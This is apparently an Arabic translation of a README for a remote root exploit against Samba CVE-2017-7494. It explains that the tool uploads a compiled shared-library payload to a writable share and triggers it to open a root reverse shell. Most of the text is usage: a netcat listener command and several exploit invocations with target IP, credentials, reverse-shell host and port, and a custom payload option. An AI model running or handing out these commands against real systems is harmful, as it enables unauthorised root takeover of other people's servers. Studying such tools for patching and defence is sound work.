
أداة استغلال عن بُعد لجذر نظام SAMBA (CVE-2017-7494) تقوم بتجميع حمولة مكتبة مشتركة، وتحميلها إلى مشاركة قابلة للكتابة، وتفعيل تحميلها لتوليد شل عكسي بصلاحيات الجذر.
استغلال الجذر عن بُعد لثغرة SAMBA CVE-2017-7494.
ينقسم هذا الاستغلال إلى جزأين:
طالما أن الهدف ضعيف والحمولة مناسبة لنظام التشغيل ومعمارية الهدف، فإن الاستغلال موثوق بنسبة 100%.
على جهازك، قم بتشغيل الأمر التالي:
$ nc -p 31337 -l
ثم، قم بتشغيل الاستغلال ضد هدفك وانتظر حتى يتصل مرة أخرى بـ Netcat الخاص بك:
$ python cve_2017_7494.py -t target_ip
إذا أغلقت الشل العكسي بسرعة كبيرة، بدلاً من إعادة تشغيل الاستغلال لرفع الوحدة، إلخ... يمكنك فقط تمرير مسار الوحدة التي تم رفعها بالفعل. بافتراض أنها تم رفعها إلى /shared/directory/ باسم "module.so"، يمكنك تشغيل أمر مثل التالي:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
يمكنك الآن تشغيل الاستغلال على samba 3.5.0 و 3.6.0، ما عليك سوى إضافة الوسيطة -o 1
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
يمكنك الآن استخدام ملف .so المخصص الخاص بك
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
في حال احتجت لتشغيل هذا السكريبت من جهاز x86، فإن تجميع ملفات implant الثنائية سينشئ ملفين بتنسيق x86. باستخدام العلامة -n 1 يمكنك تعطيل التجميع ونسخ libimplantx64.so من جهاز آخر.
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
إذا كان samba يعمل فقط على المنفذ 139، يمكنك تعيين منفذ الخادم البعيد باستخدام الوسيطة -p
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
لم أعد أدعمه بعد الآن.
-- Joxean Koret